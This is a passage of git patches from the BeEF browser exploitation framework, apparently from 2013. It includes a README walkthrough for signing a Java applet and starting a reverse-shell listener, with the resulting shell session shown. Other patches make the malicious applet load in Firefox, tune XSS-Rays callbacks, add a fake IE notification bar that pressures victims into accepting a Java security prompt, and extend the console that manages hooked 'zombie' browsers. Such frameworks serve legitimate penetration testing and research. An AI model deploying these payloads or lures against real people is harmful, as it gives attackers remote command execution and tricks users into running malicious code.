+At this stage you need to sign the applet.
+The following is to create a self-signed certificate and then sign it.
+Obviously if you have a valid code signing certificate, even better ;)
+
+keytool -keystore tmp -genkey
+jarsigner -keystore tmp Applet_ReverseTCP.jar mykey
+
+Now replace the newly signed Applet_ReverseTCP.jar in the BeEF module.
+
+You're now ready to rock. start the reverse handler listener with (update payload/host/port if necessary):
+java -cp ../../lib/asm-3.2.jar:../../JavaPayload.jar javapayload.handler.stager.StagerHandler ReverseTCP 127.0.0.1 6666 -- JSh
+
+Now launch the BeEF module.
+If the victim RUN the Signed Java Applet, job done and you can interact with the applet from the reverse connection handler:
+antisnatchor$ java -cp ../../lib/asm-3.2.jar:../../JavaPayload.jar javapayload.handler.stager.StagerHandler ReverseTCP 127.0.0.1 6666 -- JSh
+! help
+help: show information about commands.
+  Usage: help [command]
+
+Supported commands:
+    help   - show this help
+    info   - list system properties
+    pwd    - show current directory
+    cd     - change directory
+    ls     - list directory
+    exec   - execute native command
+    cat    - show text file
+    wget   - download file
+    telnet - create TCP connection
+    paste  - create text file
+    jobs   - list or continue jobs
+    exit   - Exit JSh
+
+When inside an interactive command, enter ~. on a new
+line to exit from that command. Enter ~& to background the command.
+Enter ~~ to start a line with a ~ character
\ No newline at end of file
diff --git a/modules/exploits/local_host/java_payload/config.yaml b/modules/exploits/local_host/java_payload/config.yaml
index 0988b5c10..5aaa61d93 100755
--- a/modules/exploits/local_host/java_payload/config.yaml
+++ b/modules/exploits/local_host/java_payload/config.yaml
@@ -12,5 +12,4 @@ beef:
             description: "Inject a malicious signed Java Applet (JavaPayload) that connects back to the attacker giving basic shell commands, command exec and wget.<br /><br />Before launching it, be sure to have the JavaPayload StagerHandler listening,<br />i.e.: java javapayload.handler.stager.StagerHandler &lt;payload&gt; &lt;IP&gt; &lt;port&gt; -- JSh<br /><br />Windows Vista is not supported."
             authors: ["antisnatchor"]
             target:
-                not_working: ["FF"]
                 user_notify: ["All"]
diff --git a/modules/exploits/local_host/java_payload/module.rb b/modules/exploits/local_host/java_payload/module.rb
index ec911011b..97caa35d4 100755
--- a/modules/exploits/local_host/java_payload/module.rb
+++ b/modules/exploits/local_host/java_payload/module.rb
@@ -6,7 +6,7 @@
 class Java_payload < BeEF::Core::Command
 
   def pre_send
-    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/exploits/local_host/java_payload/AppletReverseTCP-0.2.jar', '/anti', 'jar')
+    BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/exploits/local_host/java_payload/Applet_ReverseTCP.jar', '/anti', 'jar')
   end
 
   def self.options

From 78410e28eb58d2c5d0b6c954a43884f63e5c9f1f Mon Sep 17 00:00:00 2001
From: antisnatchor <antisnatchor@gmail.com>
Date: Sat, 6 Apr 2013 12:30:00 +0100
Subject: [PATCH 261/397] Changed attachApplet dom.js method to use <applet>
 also for Firefox, instead of the <embed> tag. This fixes some issues when
 running Signed Applets.

---
 core/main/client/dom.js | 39 ++++++++++++++++++++-------------------
 1 file changed, 20 insertions(+), 19 deletions(-)

diff --git a/core/main/client/dom.js b/core/main/client/dom.js
index 913aeae73..6725c99ad 100644
--- a/core/main/client/dom.js
+++ b/core/main/client/dom.js
@@ -392,7 +392,7 @@ beef.dom = {
             }
             content += "</object>";
         }
-        if (beef.browser.isC() || beef.browser.isS() || beef.browser.isO()) {
+        if (beef.browser.isC() || beef.browser.isS() || beef.browser.isO() || beef.browser.isFF()) {
 
             if (codebase != null) {
                 content = "" +
@@ -411,24 +411,25 @@ beef.dom = {
             }
             content += "</applet>";
         }
-        if (beef.browser.isFF()) {
-            if (codebase != null) {
-                content = "" +
-                    "<embed id='" + id + "' code='" + code + "' " +
-                    "type='application/x-java-applet' codebase='" + codebase + "' " +
-                    "height='0' width='0' name='" + name + "'>";
-            } else {
-                content = "" +
-                    "<embed id='" + id + "' code='" + code + "' " +
-                    "type='application/x-java-applet' archive='" + archive + "' " +
-                    "height='0' width='0' name='" + name + "'>";
-            }
-
-            if (params != null) {
-                content += beef.dom.parseAppletParams(params);
-            }
-            content += "</embed>";
-        }
+        // For some reasons JavaPaylod is not working if the applet is attached to the DOM with the embed tag rather than the applet tag.
+//        if (beef.browser.isFF()) {
+//            if (codebase != null) {
+//                content = "" +
+//                    "<embed id='" + id + "' code='" + code + "' " +
+//                    "type='application/x-java-applet' codebase='" + codebase + "' " +
+//                    "height='0' width='0' name='" + name + "'>";
+//            } else {
+//                content = "" +
+//                    "<embed id='" + id + "' code='" + code + "' " +
+//                    "type='application/x-java-applet' archive='" + archive + "' " +
+//                    "height='0' width='0' name='" + name + "'>";
+//            }
+//
+//            if (params != null) {
+//                content += beef.dom.parseAppletParams(params);
+//            }
+//            content += "</embed>";
+//        }
         $j('body').append(content);
     },
 

From 85b204f52b2058452c3c99b1ac3a13ff057864ca Mon Sep 17 00:00:00 2001
From: antisnatchor <antisnatchor@gmail.com>
Date: Sun, 7 Apr 2013 13:19:23 +0100
Subject: [PATCH 262/397] Updated beef.hardware component name for consistency.

---
 core/main/client/hardware.js | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/core/main/client/hardware.js b/core/main/client/hardware.js
index c607599ef..a9646b7bf 100644
--- a/core/main/client/hardware.js
+++ b/core/main/client/hardware.js
@@ -126,4 +126,4 @@ beef.hardware = {
 	}
 };
 
-beef.regCmp('beef.net.hardware');
+beef.regCmp('beef.hardware');

From 73e291832ecd413f9a53837e8b31952db3860e5e Mon Sep 17 00:00:00 2001
From: antisnatchor <antisnatchor@gmail.com>
Date: Sun, 7 Apr 2013 15:54:14 +0100
Subject: [PATCH 263/397] Replacing document.location.href with location in
 xssrays.js.

---
 core/main/client/net/xssrays.js | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/core/main/client/net/xssrays.js b/core/main/client/net/xssrays.js
index 183c8cfa5..1eccb54d5 100644
--- a/core/main/client/net/xssrays.js
+++ b/core/main/client/net/xssrays.js
@@ -340,7 +340,7 @@ beef.net.xssrays = {
                         beef.net.xssrays.rays[beef.net.xssrays.uniqueID].vector.poc = pocurl;
                         beef.net.xssrays.rays[beef.net.xssrays.uniqueID].vector.method = method;
 
-                        beefCallback = "document.location.href='" + this.beefRayUrl + "?hbsess=" + this.hookedBrowserSession + "&raysid=" + this.xssraysScanId
+                        beefCallback = "location='" + this.beefRayUrl + "?hbsess=" + this.hookedBrowserSession + "&raysid=" + this.xssraysScanId
                             + "&action=ray" + "&p=" + ray.vector.poc + "&n=" + ray.vector.name + "&m=" + ray.vector.method + "'";
 
                         exploit = vector.input.replace(/XSS/g, beefCallback);

From b4732a94380f2098403cdcd2eaa230630c7736ce Mon Sep 17 00:00:00 2001
From: Christian Frichot <xntrik@gmail.com>
Date: Mon, 8 Apr 2013 13:08:56 +0800
Subject: [PATCH 264/397] Fixes #876. Can detect Chrome 26.

---
 core/main/client/browser.js | 17 +++++++++++++++--
 1 file changed, 15 insertions(+), 2 deletions(-)

diff --git a/core/main/client/browser.js b/core/main/client/browser.js
index 82556c71a..edded787e 100644
--- a/core/main/client/browser.js
+++ b/core/main/client/browser.js
@@ -444,12 +444,20 @@ beef.browser = {
         return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 25) ? true : false);
     },
 
+    /**
+     * Returns true if Chrome 26.
+     * @example: beef.browser.isC26()
+     */
+    isC26:function () {
+        return (!!window.chrome && !window.webkitPerformance && window.navigator.appVersion.match(/Chrome\/(\d+)\./)) && ((parseInt(window.navigator.appVersion.match(/Chrome\/(\d+)\./)[1], 10) == 26) ? true : false);
+    },
+
     /**
      * Returns true if Chrome.
      * @example: beef.browser.isC()
      */
     isC:function () {
-        return this.isC5() || this.isC6() || this.isC7() || this.isC8() || this.isC9() || this.isC10() || this.isC11() || this.isC12() || this.isC13() || this.isC14() || this.isC15() || this.isC16() || this.isC17() || this.isC18() || this.isC19() || this.isC20() || this.isC21() || this.isC22() || this.isC23() || this.isC24() || this.isC25();
+        return this.isC5() || this.isC6() || this.isC7() || this.isC8() || this.isC9() || this.isC10() || this.isC11() || this.isC12() || this.isC13() || this.isC14() || this.isC15() || this.isC16() || this.isC17() || this.isC18() || this.isC19() || this.isC20() || this.isC21() || this.isC22() || this.isC23() || this.isC24() || this.isC25() || this.isC26();
     },
 
     /**
@@ -530,6 +538,7 @@ beef.browser = {
             C23:this.isC23(), // Chrome 23
             C24:this.isC24(), // Chrome 24
             C25:this.isC25(), // Chrome 25
+            C26:this.isC26(), // Chrome 26
             C:this.isC(), // Chrome any version
 
             FF2:this.isFF2(), // Firefox 2
@@ -667,7 +676,11 @@ beef.browser = {
         if (this.isC25()) {
             return '25'
         }
-        ;
+        ;    // Chrome 25
+        if (this.isC26()) {
+            return '26'
+        }
+        ;    // Chrome 26
         if (this.isFF2()) {
             return '2'
         }

From fad33dfea74ded92443ff0cefd31753f05402247 Mon Sep 17 00:00:00 2001
From: Christian Frichot <xntrik@gmail.com>
Date: Mon, 8 Apr 2013 19:36:02 +0800
Subject: [PATCH 265/397] Fixes #877. New IE Fake Notification Bar Module

---
 .../fake_notification/command.js              | 34 +++++++++++++++++++
 .../fake_notification/config.yaml             | 15 ++++++++
 .../fake_notification/module.rb               | 28 +++++++++++++++
 3 files changed, 77 insertions(+)
 create mode 100644 modules/social_engineering/fake_notification/command.js
 create mode 100644 modules/social_engineering/fake_notification/config.yaml
 create mode 100644 modules/social_engineering/fake_notification/module.rb

diff --git a/modules/social_engineering/fake_notification/command.js b/modules/social_engineering/fake_notification/command.js
new file mode 100644
index 000000000..541698a93
--- /dev/null
+++ b/modules/social_engineering/fake_notification/command.js
@@ -0,0 +1,34 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+	var id = beef.dom.generateID();
+	var pid = beef.dom.generateID();
+	var zztop = beef.dom.getHighestZindex()+1;
+	var el = beef.dom.createElement('div',{'id':id,'style':'width:100%; position:fixed; top:0px; left:0px; margin:0; padding:2px 20px 5px 24px; z-index:'+zztop+'; border-bottom:1px solid black; background:#ffffda; display:none; font-family: \'Tahoma\',sans-serif; font-size: 12px; '});
+	var ell = beef.dom.createElement('div',{'style':'width: 16px; height: 18px; padding: 0; margin: 3px 0px 5px 5px; position: absolute; left: 0px; top: 0px; background-image: url(data:image/png;base64,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);'})
+	var elr = beef.dom.createElement('div',{'style':'width: 8px; height: 8px; padding: 0; margin: 7px 50px 5px 0px; position: absolute; right: 0px; top: 0px; background-image: url(data:image/png;base64,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);'})
+	var elp = beef.dom.createElement('p',{'id':pid,'style':'padding: 0; margin: 0 50px 0 4px;'});
+	$j('body').append(el);
+	var hid = '#'+id;
+	var hpid = '#'+pid;
+	$j(hid).append(elp);
+	$j(hpid).html('<%= @notification_text %>');
+	$j(hid).append(ell);
+	$j(hid).append(elr);
+	$j(hid).click(function() {
+		$j(this).slideUp(300,function() {
+			$j(this).remove();
+		});
+		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=User has clicked the notification');
+	});
+	$j(hid).css('cursor','pointer');
+	$j(hid).slideDown(300,function() {
+		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Notification has been displayed');
+	});
+
+});
diff --git a/modules/social_engineering/fake_notification/config.yaml b/modules/social_engineering/fake_notification/config.yaml
new file mode 100644
index 000000000..fb4ccf970
--- /dev/null
+++ b/modules/social_engineering/fake_notification/config.yaml
@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        fake_notification:
+            enable: true
+            category: "Social Engineering"
+            name: "Fake Notification"
+            description: "Displays a fake notification at the top of the screen, similar to those presented in IE."
+            authors: ["xntrik"]
+            target:
+                user_notify: ['ALL']
diff --git a/modules/social_engineering/fake_notification/module.rb b/modules/social_engineering/fake_notification/module.rb
new file mode 100644
index 000000000..c169f99a5
--- /dev/null
+++ b/modules/social_engineering/fake_notification/module.rb
@@ -0,0 +1,28 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Fake_notification < BeEF::Core::Command
+
+  def self.options
+    return [
+      { 'name' => 'notification_text',
+        'description' => 'Text displayed in the notification bar',
+        'ui_label' => 'Text displayed in the notification bar',
+        'value' => "This website wants to run the following applet: \\'Java\\' from \\'Microsoft Inc\\'. To continue using this website you must accept the following security popup"
+      }
+    ]
+  end
+  
+  #
+  # This method is being called when a zombie sends some
+  # data back to the framework.
+  #
+  def post_execute
+    content = {}
+    content['result'] = @datastore['result']
+    save content
+  end
+  
+end

From d855100ac9849f10c628a8e4241013cd0f531d12 Mon Sep 17 00:00:00 2001
From: Christian Frichot <xntrik@gmail.com>
Date: Mon, 8 Apr 2013 21:52:50 +0800
Subject: [PATCH 266/397] Fixes #878 and #758.

---
 .../console/lib/command_dispatcher/command.rb | 14 +++++-
 .../console/lib/command_dispatcher/core.rb    | 14 ++++--
 .../console/lib/command_dispatcher/target.rb  | 46 ++++++++++++++++---
 extensions/console/lib/shellinterface.rb      | 10 ++--
 4 files changed, 69 insertions(+), 15 deletions(-)

diff --git a/extensions/console/lib/command_dispatcher/command.rb b/extensions/console/lib/command_dispatcher/command.rb
index d891b3ad4..4c74acbfa 100644
--- a/extensions/console/lib/command_dispatcher/command.rb
+++ b/extensions/console/lib/command_dispatcher/command.rb
@@ -41,7 +41,7 @@ class Command
     }
       
     print_line("Module name: " + driver.interface.cmd['Name'])
-    print_line("Module category: " + driver.interface.cmd['Category'])
+    print_line("Module category: " + driver.interface.cmd['Category'].to_s)
     print_line("Module description: " + driver.interface.cmd['Description'])
     print_line("Module parameters:") if not driver.interface.cmd['Data'].length == 0
 
@@ -119,6 +119,7 @@ class Command
         ])
 
     if args[0] == nil
+      lastcmdid = nil
       driver.interface.getcommandresponses.each do |resp|
         indiresp = driver.interface.getindividualresponse(resp['object_id'])
         respout = ""
@@ -126,6 +127,7 @@ class Command
           respout = "No response yet"
         else
           respout = Time.at(indiresp[0]['date'].to_i).to_s
+          lastcmdid = resp['object_id']
         end
         tbl << [resp['object_id'].to_s, resp['creationdate'], respout]
       end
@@ -133,6 +135,16 @@ class Command
       puts "\n"
       puts "List of responses for this command module:\n"
       puts tbl.to_s + "\n"
+
+      if not lastcmdid.nil?
+        resp = driver.interface.getindividualresponse(lastcmdid)
+        puts "\n"
+        print_line("The last response [" + lastcmdid.to_s + "] was retrieved: " + Time.at(resp[0]['date'].to_i).to_s)
+        print_line("Response:")
+        resp.each do |op|
+          print_line(op['data']['data'].to_s)
+        end
+      end
     else
       output = driver.interface.getindividualresponse(args[0])
       if output.nil?
diff --git a/extensions/console/lib/command_dispatcher/core.rb b/extensions/console/lib/command_dispatcher/core.rb
index 904e5991a..15844da23 100644
--- a/extensions/console/lib/command_dispatcher/core.rb
+++ b/extensions/console/lib/command_dispatcher/core.rb
@@ -141,13 +141,14 @@ class Core
         [
           'Id',
           'IP',
+          'Hook Host',
           'Browser',
           'OS',
           'Hardware'
         ])
     
     BeEF::Core::Models::HookedBrowser.all(:lastseen.gte => (Time.new.to_i - 30)).each do |zombie|
-      tbl << [zombie.id,zombie.ip,BeEF::Core::Models::BrowserDetails.get(zombie.session, 'BrowserName')+"-"+BeEF::Core::Models::BrowserDetails.get(zombie.session, 'BrowserVersion'),BeEF::Core::Models::BrowserDetails.get(zombie.session, 'OsName'),BeEF::Core::Models::BrowserDetails.get(zombie.session, 'Hardware')]
+      tbl << [zombie.id,zombie.ip,BeEF::Core::Models::BrowserDetails.get(zombie.session,"HostName").to_s,BeEF::Core::Models::BrowserDetails.get(zombie.session, 'BrowserName').to_s+"-"+BeEF::Core::Models::BrowserDetails.get(zombie.session, 'BrowserVersion').to_s,BeEF::Core::Models::BrowserDetails.get(zombie.session, 'OsName'),BeEF::Core::Models::BrowserDetails.get(zombie.session, 'Hardware')]
     end
     
     puts "\n"
@@ -174,12 +175,14 @@ class Core
         [
           'Id',
           'IP',
+          'Hook Host',
           'Browser',
-          'OS'
+          'OS',
+          'Hardware'
         ])
     
     BeEF::Core::Models::HookedBrowser.all(:lastseen.lt => (Time.new.to_i - 30)).each do |zombie|
-      tbl << [zombie.id,zombie.ip,BeEF::Core::Models::BrowserDetails.get(zombie.session, 'BrowserName')+"-"+BeEF::Core::Models::BrowserDetails.get(zombie.session, 'BrowserVersion'),BeEF::Core::Models::BrowserDetails.get(zombie.session, 'OsName')]
+      tbl << [zombie.id,zombie.ip,BeEF::Core::Models::BrowserDetails.get(zombie.session,"HostName").to_s,BeEF::Core::Models::BrowserDetails.get(zombie.session, 'BrowserName').to_s+"-"+BeEF::Core::Models::BrowserDetails.get(zombie.session, 'BrowserVersion').to_s,BeEF::Core::Models::BrowserDetails.get(zombie.session, 'OsName'),BeEF::Core::Models::BrowserDetails.get(zombie.session, 'Hardware')]
     end
     
     puts "\n"
@@ -327,7 +330,12 @@ class Core
         driver.run_single("offline")
       when 'commands'
         if driver.dispatched_enstacked(Target)
+          if args[1] == "-s" and not args[2].nil?
+           driver.run_single("commands #{args[1]} #{args[2]}")
+           return
+         else
           driver.run_single("commands")
+        end
         else
           print_error("You aren't targeting a zombie yet")
         end
diff --git a/extensions/console/lib/command_dispatcher/target.rb b/extensions/console/lib/command_dispatcher/target.rb
index 5c06e94d2..e7e22e30f 100644
--- a/extensions/console/lib/command_dispatcher/target.rb
+++ b/extensions/console/lib/command_dispatcher/target.rb
@@ -18,7 +18,7 @@ class Target
     begin
       driver.interface.getcommands.each { |folder|
         folder['children'].each { |command|
-          @@commands << folder['text'] + command['text'].gsub(/[-\(\)]/,"").gsub(/\W+/,"_")
+          @@commands << folder['text'].gsub(/\s/,"_") + command['text'].gsub(/[-\(\)]/,"").gsub(/\W+/,"_")
         }
       }
     rescue
@@ -40,17 +40,29 @@ class Target
   
   @@bare_opts = Rex::Parser::Arguments.new(
 	  "-h" => [ false, "Help."              ])
+
+  @@commands_opts = Rex::Parser::Arguments.new(
+    "-h" => [ false, "Help."],
+    "-s" => [ false, "<search term>"],
+    "-r" => [ false, "List modules which have responses against them only"])
   
   def cmd_commands(*args)
+
+    searchstring = nil
+    responly = nil
     
-    @@bare_opts.parse(args) {|opt, idx, val|
+    @@commands_opts.parse(args) {|opt, idx, val|
       case opt
         when "-h"
           cmd_commands_help
           return false
+        when "-s"
+          searchstring = args[1].downcase if not args[1].nil?
+        when "-r"
+          responly = true
         end
     }
-    
+
     tbl = Rex::Ui::Text::Table.new(
       'Columns' =>
         [
@@ -63,10 +75,29 @@ class Target
     
     driver.interface.getcommands.each { |folder|
       folder['children'].each { |command|
-        tbl << [command['id'].to_i,
-                folder['text'] + command['text'].gsub(/[-\(\)]/,"").gsub(/\W+/,"_"),
+
+        cmdstring = folder['text'].gsub(/\s/,"_") + command['text'].gsub(/[-\(\)]/,"").gsub(/\W+/,"_")
+
+        if not searchstring.nil?
+          if not cmdstring.downcase.index(searchstring).nil?
+            tbl << [command['id'].to_i,
+                cmdstring,
                 command['status'].gsub(/^Verified /,""),
                 driver.interface.getcommandresponses(command['id']).length] #TODO
+          end
+        elsif not responly.nil?
+             tbl << [command['id'].to_i,
+                cmdstring,
+                command['status'].gsub(/^Verified /,""),
+                driver.interface.getcommandresponses(command['id']).length] if driver.interface.getcommandresponses(command['id']).length.to_i > 0
+
+        else 
+         tbl << [command['id'].to_i,
+            cmdstring,
+            command['status'].gsub(/^Verified /,""),
+            driver.interface.getcommandresponses(command['id']).length] #TODO
+        end
+
       }
     }
     
@@ -78,6 +109,9 @@ class Target
   
